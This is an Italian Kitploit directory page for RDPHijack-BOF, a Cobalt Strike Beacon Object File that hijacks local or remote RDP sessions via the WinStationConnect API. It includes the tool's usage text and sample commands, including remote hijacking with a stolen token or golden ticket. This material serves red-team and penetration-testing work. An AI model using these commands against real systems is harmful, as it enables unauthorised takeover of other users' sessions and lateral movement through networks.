Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
RDPHijack-BOF — Cobalt Strike Beacon Object File (BOF) che utilizza l'API WinStationConnect per eseguire il dirottamento di sessione RDP locale/remoto. | Kitploit
Strumenti/GitHubGitHub/netero1010/rdphijack-bof
Framework di ExploitMovimento LateralePost-ExploitPenetration TestingRed Teaming
GitHubnetero1010/rdphijack-bof

RDPHijack-BOF

Cobalt Strike Beacon Object File (BOF) che utilizza l'API WinStationConnect per eseguire il dirottamento di sessione RDP locale/remoto.

Vedi Repository
319464 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

BOF - RDPHijack


Cobalt Strike Beacon Object File (BOF) che utilizza l'API WinStationConnect per eseguire il dirottamento di sessioni RDP locali/remote. Con un token di accesso / ticket Kerberos valido (es. golden ticket) del proprietario della sessione, sarai in grado di dirottare la sessione in remoto senza rilasciare alcun beacon/strumento sul server di destinazione.

Per enumerare le sessioni localmente/remotamente, puoi usare Quser-BOF.

Schermata

HowTo

Utilizzo

root@kitploit:~
Usage: bof-rdphijack [your console session id] [target session id to hijack] [password|server] [argument]

Command         Description
--------        -----------
password        Specifies the password of the user who owns the session to which you want to connect.
server          Specifies the remote server that you want to perform RDP hijacking.

Sample usage
--------
Redirect session 2 to session 1 (require SYSTEM privilege):
bof-rdphijack 1 2

Redirect session 2 to session 1 with password of the user who owns the session 2 (require high integrity beacon):
bof-rdphijack 1 2 password P@ssw0rd123

Redirect session 2 to session 1 for a remote server (require token/ticket of the user who owns the session 2):
bof-rdphijack 1 2 server SQL01.lab.internal

Compilazione

make

Riferimenti

tscon.exe

Scarica lo strumento